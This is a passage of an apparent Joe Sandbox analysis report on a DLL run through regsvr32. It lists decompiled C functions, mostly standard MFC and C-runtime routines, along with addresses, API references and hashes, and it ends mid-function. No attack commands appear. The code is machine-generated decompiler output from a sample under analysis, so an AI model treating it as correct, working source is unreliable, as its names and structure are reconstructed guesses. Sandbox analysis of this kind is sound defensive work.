                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$EmptyWindow_malloc
                                                                                                                • String ID: @
                                                                                                                • API String ID: 299164714-2766056989
                                                                                                                • Opcode ID: 231956de7690e02c2dc6420e6d14d227eb916f6845a0a5c2140db660af6d1e05
                                                                                                                • Instruction ID: caa1d8ef8b3ff2674ffc05b96da04f017d462dea4e3151a0d893637e03f8ddd5
                                                                                                                • Opcode Fuzzy Hash: 231956de7690e02c2dc6420e6d14d227eb916f6845a0a5c2140db660af6d1e05
                                                                                                                • Instruction Fuzzy Hash: 88C1197190021AAFCF05CFA8C885AEEBBF5FF48355F11856DE856AB251DB34AA40CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10017057 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E10017057(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t62;

				_t62 = E1001DD4F(_t54, _t58, _t60, __eflags) + 0x7c;
				_t55 =  *((intOrPtr*)(E1001E302(_t54, _t58, _t62, __eflags) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L4:
					_v8 =  *((intOrPtr*)(E10049097(__eflags)));
					_t33 = E10049097(__eflags);
					_push(_a16);
					 *_t33 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E1004C1D3(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t55);
					goto L5;
				} else {
					_t69 = _a16;
					if(_a16 != 0) {
						goto L4;
					}
					_v8 =  *((intOrPtr*)(E10049097(_t69)));
					_t52 = E10049097(_t69);
					_push(_a4);
					 *_t52 = 0;
					E1004C1D3(_t62, 0x60, 0x5f, "Afx:%p:%x", _t55);
					L5:
					_t35 = E10049097(_t69);
					_t70 =  *_t35;
					if( *_t35 == 0) {
						_t36 = E10049097(__eflags);
						_t57 = _v8;
						 *_t36 = _v8;
					} else {
						E1000AD19( *((intOrPtr*)(E10049097(_t70))));
						_pop(_t57);
					}
					_push( &_v48);
					_push(_t62);
					_push(_t55);
					_t38 = E1001242B(_t55, _t57, 0, _t62, _t70);
					_t71 = _t38;
					if(_t38 == 0) {
						_v48 = _a4;
						_v44 = DefWindowProcA;
						_v28 = _a16;
						_v24 = _a8;
						_v20 = _a12;
						_push( &_v48);
						_v36 = 0;
						_v40 = 0;
						_v32 = _t55;
						_v16 = 0;
						_v12 = _t62;
						if(L10016FC9(_t55, _t57, 0, _t62, _t71) == 0) {
							E1000C2E1(_t57);
						}
					}
					return _t62;
				}
			}




























                                                                                                                0x10017067
                                                                                                                0x1001706f
                                                                                                                0x10017077
                                                                                                                0x100170ac
                                                                                                                0x100170b3
                                                                                                                0x100170b6
                                                                                                                0x100170bb
                                                                                                                0x100170be
                                                                                                                0x100170c0
                                                                                                                0x100170c3
                                                                                                                0x100170c6
                                                                                                                0x100170d4
                                                                                                                0x00000000
                                                                                                                0x1001707e
                                                                                                                0x1001707e
                                                                                                                0x10017081
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001708a
                                                                                                                0x1001708d
                                                                                                                0x10017092
                                                                                                                0x10017095
                                                                                                                0x100170a2
                                                                                                                0x100170dc
                                                                                                                0x100170dc
                                                                                                                0x100170e1
                                                                                                                0x100170e3
                                                                                                                0x100170f4
                                                                                                                0x100170f9
                                                                                                                0x100170fc
                                                                                                                0x100170e5
                                                                                                                0x100170ec
                                                                                                                0x100170f1
                                                                                                                0x100170f1
                                                                                                                0x10017101
                                                                                                                0x10017102
                                                                                                                0x10017103
                                                                                                                0x10017104
                                                                                                                0x1001710c
                                                                                                                0x1001710e
                                                                                                                0x10017113
                                                                                                                0x1001711b
                                                                                                                0x10017121
                                                                                                                0x10017127
                                                                                                                0x1001712d
                                                                                                                0x10017133
                                                                                                                0x10017134
                                                                                                                0x10017137
                                                                                                                0x1001713a
                                                                                                                0x1001713d
                                                                                                                0x10017140
                                                                                                                0x1001714a
                                                                                                                0x1001714c
                                                                                                                0x1001714c
                                                                                                                0x1001714a
                                                                                                                0x10017157
                                                                                                                0x10017157

                                                                                                                APIs
                                                                                                                • __snprintf_s.LIBCMT ref: 100170A2
                                                                                                                  • Part of subcall function 1004C1D3: __vsnprintf_s_l.LIBCMT ref: 1004C1E8
                                                                                                                • __snprintf_s.LIBCMT ref: 100170D4
                                                                                                                  • Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snprintf_s$__getptd_noexit__vsnprintf_s_l
                                                                                                                • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                                • API String ID: 3029210900-2801496823
                                                                                                                • Opcode ID: 3c6da9fbff05cd2ebeb11c550e62aa1aee221b428ba4dac0de3410c076cb883f
                                                                                                                • Instruction ID: cdf93d0280f2cea4f25f4823816fbdce5615ba8bd02a0b44cf6043f8a17af632
                                                                                                                • Opcode Fuzzy Hash: 3c6da9fbff05cd2ebeb11c550e62aa1aee221b428ba4dac0de3410c076cb883f
                                                                                                                • Instruction Fuzzy Hash: B131FAB9900309EFDB12DFA9CC4199E7BF4FF49250F214066F908AB212D735EA90DB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10025850 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E10025850(void* __ebx, long long* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				void* _t35;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t75;
				long long* _t76;

				_push(4);
				E1004764D(0x1008f979, __ebx, __edi, __esi);
				 *(_t75 - 0x10) =  *(_t75 - 0x10) & 0x00000000;
				_t34 =  *((intOrPtr*)(__ecx + 8));
				_t78 = _t34 - 2;
				if(_t34 != 2) {
					__eflags = _t34 - 1;
					if(_t34 != 1) {
						 *(_t75 - 0x10) =  *(_t75 - 0x10) & 0x00000000;
						_t35 = _t75 - 0x10;
						 *(_t75 - 4) = 1;
						 *_t76 =  *__ecx;
						__imp__#114(__ecx, __ecx,  *((intOrPtr*)(_t75 + 0x10)),  *((intOrPtr*)(_t75 + 0xc)), _t35);
						__eflags = _t35;
						if(__eflags >= 0) {
							_push( *(_t75 - 0x10));
							E1000B053(__ebx, _t75 + 0x10, __edi, __esi, __eflags);
							 *(_t75 - 4) = 3;
							L100010F5( *((intOrPtr*)(_t75 + 8)), __eflags, _t75 + 0x10);
							_t60 =  *((intOrPtr*)(_t75 + 0x10));
						} else {
							L1000140B(_t75 + 0xc, E100184C0());
							 *(_t75 - 4) = 2;
							__eflags = L10001276(_t75 + 0xc, 0xd800);
							_t64 =  *((intOrPtr*)(_t75 + 8));
							if(__eflags == 0) {
								_push("Invalid DateTime");
								E1000B543(__ebx, _t64, __edi, __esi, __eflags);
							} else {
								L100010F5(_t64, __eflags, _t75 + 0xc);
							}
							_t60 =  *((intOrPtr*)(_t75 + 0xc));
						}
						__eflags = _t60 + 0xfffffff0;
						L100013E3(_t60 + 0xfffffff0, 1);
						__imp__#6( *(_t75 - 0x10));
					} else {
						L1000140B(_t75 + 0xc, E100184C0());
						 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
						__eflags = L10001276(_t75 + 0xc, 0xd800);
						_t67 =  *((intOrPtr*)(_t75 + 8));
						if(__eflags == 0) {
							_push("Invalid DateTime");
							E1000B543(__ebx, _t67, __edi, __esi, __eflags);
						} else {
							L100010F5(_t67, __eflags, _t75 + 0xc);
						}
						L100013E3( *((intOrPtr*)(_t75 + 0xc)) + 0xfffffff0, 1);
					}
				} else {
					_push(0x1009c448);
					E1000B543(__ebx,  *((intOrPtr*)(_t75 + 8)), __edi, __esi, _t78);
				}
				return E10047725( *((intOrPtr*)(_t75 + 8)));
			}










                                                                                                                0x10025850
                                                                                                                0x10025857
                                                                                                                0x1002585c
                                                                                                                0x10025860
                                                                                                                0x10025863
                                                                                                                0x10025866
                                                                                                                0x1002587d
                                                                                                                0x1002587f
                                                                                                                0x100258cc
                                                                                                                0x100258d2
                                                                                                                0x100258d9
                                                                                                                0x100258e1
                                                                                                                0x100258e4
                                                                                                                0x100258ea
                                                                                                                0x100258ec
                                                                                                                0x1002592e
                                                                                                                0x10025934
                                                                                                                0x10025940
                                                                                                                0x10025944
                                                                                                                0x10025949
                                                                                                                0x100258ee
                                                                                                                0x100258f7
                                                                                                                0x10025904
                                                                                                                0x1002590d
                                                                                                                0x1002590f
                                                                                                                0x10025912
                                                                                                                0x10025922
                                                                                                                0x10025927
                                                                                                                0x10025914
                                                                                                                0x10025918
                                                                                                                0x10025918
                                                                                                                0x1002591d
                                                                                                                0x1002591d
                                                                                                                0x1002594c
                                                                                                                0x1002594f
                                                                                                                0x10025957
                                                                                                                0x10025881
                                                                                                                0x1002588a
                                                                                                                0x1002588f
                                                                                                                0x100258a0
                                                                                                                0x100258a2
                                                                                                                0x100258a5
                                                                                                                0x100258c0
                                                                                                                0x100258c5
                                                                                                                0x100258a7
                                                                                                                0x100258ab
                                                                                                                0x100258ab
                                                                                                                0x100258b6
                                                                                                                0x100258b6
                                                                                                                0x10025868
                                                                                                                0x1002586b
                                                                                                                0x10025870
                                                                                                                0x10025870
                                                                                                                0x10025965

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10025857
                                                                                                                  • Part of subcall function 1000B543: __EH_prolog3.LIBCMT ref: 1000B54A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID: Invalid DateTime
                                                                                                                • API String ID: 431132790-2190634649
                                                                                                                • Opcode ID: 6f776fbd6c87e7c9310018bac5e60b9b7257e91b4a3c306342cbe11a70d55a04
                                                                                                                • Instruction ID: 067318ef8cb8f0eea395baab5e4922b740af21be137fd8082c09c2c459eaa513
                                                                                                                • Opcode Fuzzy Hash: 6f776fbd6c87e7c9310018bac5e60b9b7257e91b4a3c306342cbe11a70d55a04
                                                                                                                • Instruction Fuzzy Hash: D0318B3850014AEBEB04DFA4CC42BEE3769FF00395F50C519F92A96196DF71AB44CB25
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100461BC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E100461BC(void* __ebx, void* __ecx, void* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _v64;
				void* __edi;
				void* __ebp;
				signed int _t18;
				long _t23;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t35;

				_t35 = __esi;
				_t31 = __ecx;
				_t30 = __ebx;
				_t33 = __ecx;
				E10049170(__ecx,  &_v64, 0, 0x3c);
				_t18 = _a4;
				_v52 = 0x28;
				if(_t18 != 0) {
					_v64 =  *((intOrPtr*)(_t18 + 0x20));
				} else {
					_v64 = _v64 & _t18;
				}
				_v60 = _a8;
				_v56 = _a12;
				_t23 = SendMessageA( *(_t33 + 0x20), 0x40a, 0,  &_v64);
				_pop(_t34);
				if(_t23 == 0) {
					return 0;
				} else {
					_push(E10047757(_t30, _t31, _a16, 0x30,  &_v52, 0x28));
					L1000135C(_t30, _t31, _t34, _t35);
					return 1;
				}
			}















                                                                                                                0x100461bc
                                                                                                                0x100461bc
                                                                                                                0x100461bc
                                                                                                                0x100461cb
                                                                                                                0x100461cd
                                                                                                                0x100461d2
                                                                                                                0x100461da
                                                                                                                0x100461e1
                                                                                                                0x100461eb
                                                                                                                0x100461e3
                                                                                                                0x100461e3
                                                                                                                0x100461e3
                                                                                                                0x100461f1
                                                                                                                0x100461f7
                                                                                                                0x10046208
                                                                                                                0x10046210
                                                                                                                0x10046211
                                                                                                                0x00000000
                                                                                                                0x10046213
                                                                                                                0x10046223
                                                                                                                0x10046224
                                                                                                                0x00000000
                                                                                                                0x1004622e

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memcpy_s_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2479521229-3887548279
                                                                                                                • Opcode ID: f770b82baededa0124a9ac80d62ad331fe20c876356ee748661109cb299e6378
                                                                                                                • Instruction ID: f95a88c069b750153419611af3e432d482e3ab38b6ba82756daf38a82866482c
                                                                                                                • Opcode Fuzzy Hash: f770b82baededa0124a9ac80d62ad331fe20c876356ee748661109cb299e6378
                                                                                                                • Instruction Fuzzy Hash: 32010875A40209BFEB50DFA4DD86F9E77F8EB08640F204425BE05E62A1EBB4E9108B55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10015735 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E10015735(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E10021F6C(__ebx, _t25, __ebp, 0xc);
				_push(E100147F3);
				_t26 = E10020524(__ebx, 0x100bdba8, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E1000A069(_t21, 0x100bdba8, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E10021FD9(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E10012699(_t21, 0x100bdba8, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}











                                                                                                                0x10015735
                                                                                                                0x10015735
                                                                                                                0x10015735
                                                                                                                0x10015738
                                                                                                                0x1001573d
                                                                                                                0x1001574c
                                                                                                                0x1001574e
                                                                                                                0x10015750
                                                                                                                0x10015752
                                                                                                                0x10015752
                                                                                                                0x10015757
                                                                                                                0x1001575b
                                                                                                                0x10015795
                                                                                                                0x10015797
                                                                                                                0x00000000
                                                                                                                0x1001575d
                                                                                                                0x1001575d
                                                                                                                0x10015762
                                                                                                                0x1001576a
                                                                                                                0x1001576d
                                                                                                                0x10015779
                                                                                                                0x1001577f
                                                                                                                0x10015781
                                                                                                                0x10015784
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10015789
                                                                                                                0x1001578f
                                                                                                                0x1001578f
                                                                                                                0x00000000
                                                                                                                0x1001576f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10021F6C: EnterCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FA8
                                                                                                                  • Part of subcall function 10021F6C: InitializeCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FB7
                                                                                                                  • Part of subcall function 10021F6C: LeaveCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FC4
                                                                                                                  • Part of subcall function 10021F6C: EnterCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FD0
                                                                                                                  • Part of subcall function 10020524: __EH_prolog3_catch.LIBCMT ref: 1002052B
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_000147F3,0000000C), ref: 10015779
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 10015789
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                • API String ID: 2853499158-63838506
                                                                                                                • Opcode ID: e728941f19ab12fa9c8826075ded7b4199ed8ede93d294f17925572643fa50ed
                                                                                                                • Instruction ID: 2fddd1d9b1a741332842403885cf4ffdfe71f473e0a6c8fe02c8f939fbf869cd
                                                                                                                • Opcode Fuzzy Hash: e728941f19ab12fa9c8826075ded7b4199ed8ede93d294f17925572643fa50ed
                                                                                                                • Instruction Fuzzy Hash: 0401D139008712DAD720DB60AE06B4A76D0EF00792F094828F5AA9D4E0EB31D8909A22
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10055EF1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E10055EF1() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x100a1cd0;
					_v28 =  *0x100a1cc8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                0x10055ef6
                                                                                                                0x10055efe
                                                                                                                0x10055f15
                                                                                                                0x10055ec1
                                                                                                                0x10055eca
                                                                                                                0x10055ed6
                                                                                                                0x10055ed9
                                                                                                                0x10055edc
                                                                                                                0x10055ede
                                                                                                                0x10055ee1
                                                                                                                0x10055ee6
                                                                                                                0x10055ef0
                                                                                                                0x10055ee8
                                                                                                                0x10055eec
                                                                                                                0x10055eec
                                                                                                                0x10055f00
                                                                                                                0x10055f06
                                                                                                                0x10055f0e
                                                                                                                0x00000000
                                                                                                                0x10055f10
                                                                                                                0x10055f10
                                                                                                                0x10055f14
                                                                                                                0x10055f14
                                                                                                                0x10055f0e

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,10048974), ref: 10055EF6
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 10055F06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                • Opcode ID: 903b33b06108be7c9a018411ec132b70dc1c98108062cdd628190353d40dd0e1
                                                                                                                • Instruction ID: a772b1b7cee335b2c17c27fa0fa3100e138ae637c69f3d7f302d0602ea8ce6ac
                                                                                                                • Opcode Fuzzy Hash: 903b33b06108be7c9a018411ec132b70dc1c98108062cdd628190353d40dd0e1
                                                                                                                • Instruction Fuzzy Hash: 2FF05430910D1DD2EF009BA5AE5E6EF7BB8FB40787F820590D691E0094DF318174D751
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10031021 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10031021(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
